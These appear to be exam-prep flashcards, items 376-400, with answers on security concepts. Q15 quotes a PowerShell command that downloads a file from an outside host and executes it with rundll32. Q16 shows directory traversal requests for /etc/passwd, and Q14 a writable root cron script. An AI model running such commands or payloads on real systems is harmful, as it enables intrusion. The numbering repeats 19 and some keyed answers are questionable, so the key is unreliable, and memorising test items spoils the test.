376-400 Flashcards

1
Q

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

A. To provide data to quantify risk based on the organization’s systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization

A

A. To provide data to quantify risk based on the organization’s systems

2
Q

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory
B. Rule-based
C. Discretionary
D. Role-based

A

A. Mandatory

3
Q

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian
B. Data controller
C. Data protection officer
D. Data processor

A

B. Data controller

4
Q

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer

A

B. SIEM

5
Q

Which of the following types of controls is a turnstile?

A. Physical
B. Detective
C. Corrective
D. Technical

A

A. Physical

6
Q

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

A. nmap
B. tracert
C. ping
D. ssh

A

A. nmap

7
Q

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

  • The exception process and policy have been correctly followed by the majority of users.
  • A small number of users did not create tickets for the requests but were granted access.
  • All access had been approved by supervisors.
  • Valid requests for the access sporadically occurred across multiple departments.
  • Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

A

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

8
Q

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral

A

C. Homomorphic

9
Q

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

A. a rootkit.
B. a PUP.
C. a backdoor.
D. ransomware.
E. a RAT.

A

B. a PUP.

10
Q

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP

A

B. # iptables -F

11
Q

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.

A

A. Document the collection and require a sign-off when possession changes.

12
Q

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.

A

C. Third-party applications are not being patched.

13
Q

Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage

A

A. Access control vestibule

14
Q

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user’s list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition

A

A. Privilege escalation

15
Q

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.

A

A. A PowerShell code is performing a DLL injection.

16
Q

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:

GET index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
GET index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2..%2fetc%2fpasswd
GET index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Which of the following BEST describes this kind of attack?

A. Directory traversal
B. SQL injection
C. API
D. Request forgery

A

A. Directory traversal

17
Q

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor

A

D. Data custodian

18
Q

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team

A

A. White team

19
Q

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN

A

D. VPN

19
Q

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.

A

D. Missing patches for third-party software on Windows workstations and servers.

20
Q

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs
B. The web server logs
C. The SIP traffic logs
D. The SNMP logs

A

A. The DNS logs

21
Q

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

A. .pfx
B. .csr
C. .pvk
D. .cer

A

D. .cer

22
Q

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography

A

B. Salting

23
Q

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

  • www.company.com (main website)
  • contactus.company.com (for locating a nearby location)
  • quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN
B. Wildcard
C. Extended validation
D. Self-signed

A

B. Wildcard

24
Q

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

A. SFTP
B. AIS
C. Tor
D. IoC

A

C. Tor